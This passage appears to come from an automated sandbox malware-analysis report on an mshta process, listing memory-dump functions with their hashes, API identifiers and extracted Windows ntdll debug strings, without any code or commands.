                                                                                                                                                                                                                                                • Instruction ID: b0cf8db67dd436c8ffe7f1c600be9d7e8f267c7f2be8cfd0e93c8ad1321a7f4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef52e644be56252fe3042fd8a10f41306365792933a75fb25a1bafbe2cd336d0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40A163F04482948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C37E89058B95
                                                                                                                                                                                                                                                Function 03B6DFB9 Relevance: 57.7, Strings: 46, Instructions: 197COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                • Opcode ID: 3cecf46ad92b818affdae02604443d68a25d9468f13ae0660348b877182c7ca5
                                                                                                                                                                                                                                                • Instruction ID: b3b0fc6c952dc3f7f843b6c6f86bb31ba4be8ca3b6e04c62b727edff343ed1e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cecf46ad92b818affdae02604443d68a25d9468f13ae0660348b877182c7ca5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C8162F04482988AC7158F55A1612AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB44
                                                                                                                                                                                                                                                Function 03882890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                                                                                                                                                                                                                • Instruction ID: 1b912dd3a13f2bbd974e255aada0555e6e8c2525d9c9cae456c0b28f16a1124e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c16bf402d535f768106875a1a80bd0f01b79da10d04cad07ec68873e96e1c214
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC51B6B5A0011ABFDF24EBD8889097EF7B8BB4920071486E9E4A5D7741D278DE51CBE0
                                                                                                                                                                                                                                                Function 038F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: 11fd45564ebfef5494b8084dc5a260389d8d3baf244d10f3d78edb71e7c249ec
                                                                                                                                                                                                                                                • Instruction ID: 2ee2e613c962a60791ba1e20c1349e0716408cf8daa79d6f348c7ae35f32417b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11fd45564ebfef5494b8084dc5a260389d8d3baf244d10f3d78edb71e7c249ec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3551E6B9A00A45AFDB60DFDCC89097EB7F9EB48200B0888D9E695D7641E7B4DA40C760
                                                                                                                                                                                                                                                Function 03877630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Execute=1, xrefs: 038B4713
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B4742
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4787
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4655
                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 038B46A0
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4725
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B46FC
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                • Opcode ID: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                                                                                                                                                                                                                • Instruction ID: d86f42ffebd4b0be5bbd2fae0ad298b9b0d247feb255a2866e1823b46de18f84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bde9667ff5ac058c5948446600f96af834823fdce4e312077260b0726d30e16
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51E735A003197AEF20EBE9DC85BFD77BAAB04304F1400E9E505EB281E771EA45CB51
                                                                                                                                                                                                                                                Function 0388B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction ID: 764cebb482963a57e3baf4553fd2308e458a05d176caf75832413a9de5dff8eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B981BC70E052499BDF26FFE8C8917AEBBA1AFC5360F1C46DAD861E7391C6349840CB51
                                                                                                                                                                                                                                                Function 038F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                • Opcode ID: 69150e01eec1be0d542d5f26b01a9dcb591a08add024c342ddc0f73037791d39
                                                                                                                                                                                                                                                • Instruction ID: db2451b7fb6efa3eb570ca03198660f05e73bead64841836f35a1445211ce7cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69150e01eec1be0d542d5f26b01a9dcb591a08add024c342ddc0f73037791d39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D721677AA002199FDB10EFF9CC409EFB7F8EF44644F480596EA05D7200E730E9418BA5
                                                                                                                                                                                                                                                Function 0386F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038B02E7
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038B02BD
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B031E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                • Opcode ID: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                                                                                                                                                                                                                • Instruction ID: ddf065d11dbab4927dfa20dd64fce8f90ea985e09c83927cc4986b9c9539e311
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb095f3e56f263de0a255ccb2d8655dae9c1fe2ea0af6c567c234f9d8f5150a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE1AD706087429FD725CFA8D884B6AB7E0BB89318F180A9DF6A5CB3D1D774D844CB52
                                                                                                                                                                                                                                                Function 0387BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038B7B7F
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 038B7B8E
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B7BAC
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                                                                                • Opcode ID: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                                                                                                                                                                                                                • Instruction ID: 3bc4cd3b3c4753e60f1aaf1911a970da1ce8122d5f6255a0456d01747aca8328
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d876b86ef706990aaec0c44293ec103858bb94ca86e9d170e63eb39e2ed03e2e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD41E3353007469FDB25DEA8C840B6AB7E7EF89710F140A9DF95ADB380DB31E4068B91
                                                                                                                                                                                                                                                Function 0387B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038B728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038B7294
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 038B72A3
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 038B72C1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                • Opcode ID: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                                                                                                                                                                                                                • Instruction ID: da4a4329f67ab53f743392e62314cd4cf6643976e6fd22d1153fb78682d34f0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6da6edb09183977e42c8e99dbd4336bfe67f2a640255f27df34f940d1eb3f1e1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8541EF35600346ABD721DEA4CC41BAAB7B6FF84714F180699F9A6EB340DB31E942C7D1
                                                                                                                                                                                                                                                Function 038F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                • Opcode ID: d97715bf047c600f8ff42ac35654c2d7a938f00207276888d5ec3c003e85eef4
                                                                                                                                                                                                                                                • Instruction ID: 9178f16893b4e4baf2f1d5c9592d8bb3b745cc7f981a1fa7138c3b4a39d0abb6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d97715bf047c600f8ff42ac35654c2d7a938f00207276888d5ec3c003e85eef4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56317ABAA006199FDB20DF6DCC40BEEB7F8EF44610F4445D6E949E7240EB70DA458BA1
                                                                                                                                                                                                                                                Function 03887D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                                • Instruction ID: 60d8aebe1ff4b24c05916ae39b04606133b09d3d4a5b3c90d2f708c73d1bf2ba
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E591A271E0021A9BDF24EFEAC8806BEB7B5AF44724F78459AF865E72C4D7309940C721
                                                                                                                                                                                                                                                Function 03849126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                                • Opcode ID: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                                                                                                                                                                                                                • Instruction ID: f7507b9bec8c78004f906bf28edc0007415c6a0d9dd654828a5dc2d2ca7d4fe1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53071baa37e4d636d0f3f230afa0cb3f1a6e46df0c709c23e3eab6a5e0af907d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E8129B5D002699BDB31DB98CC44BEEB6B8AF08710F0445EAE919F7640D7709E84CFA1
                                                                                                                                                                                                                                                Function 03B63ACE Relevance: 5.0, Strings: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: <!2+$=7:/$>$w{?>
                                                                                                                                                                                                                                                • API String ID: 0-2049954745
                                                                                                                                                                                                                                                • Opcode ID: 3493b820869af2760b885815f0f42b94271d4ed77493e30b452af5e28eb63ff1
                                                                                                                                                                                                                                                • Instruction ID: ef02c9d4fbc9e22498aa71c3cd683fe9f032748efb607315feb65a8471cc500a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3493b820869af2760b885815f0f42b94271d4ed77493e30b452af5e28eb63ff1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8F0A735018B8446CB05EB18884455E7BD1FB8831DF8417ADE8ADDB1A1DB39DA42C74A
                                                                                                                                                                                                                                                Function 03B63A78 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .d(%$;,$F9p{$p{8@
                                                                                                                                                                                                                                                • API String ID: 0-1170300894
                                                                                                                                                                                                                                                • Opcode ID: b48382efddfd3c7d66480487f48a42ca9f84fef853436968be0f4dbc52bbcdfd
                                                                                                                                                                                                                                                • Instruction ID: a636412b03a2b213b5dc36d0bea0730b898dd4ee5ab44d8eee91ec2569862b1f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b48382efddfd3c7d66480487f48a42ca9f84fef853436968be0f4dbc52bbcdfd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CF0A034018B8847C709AB14D44465ABBD1FBC830CF400B9DE8CEEB2A5DA78C605C74A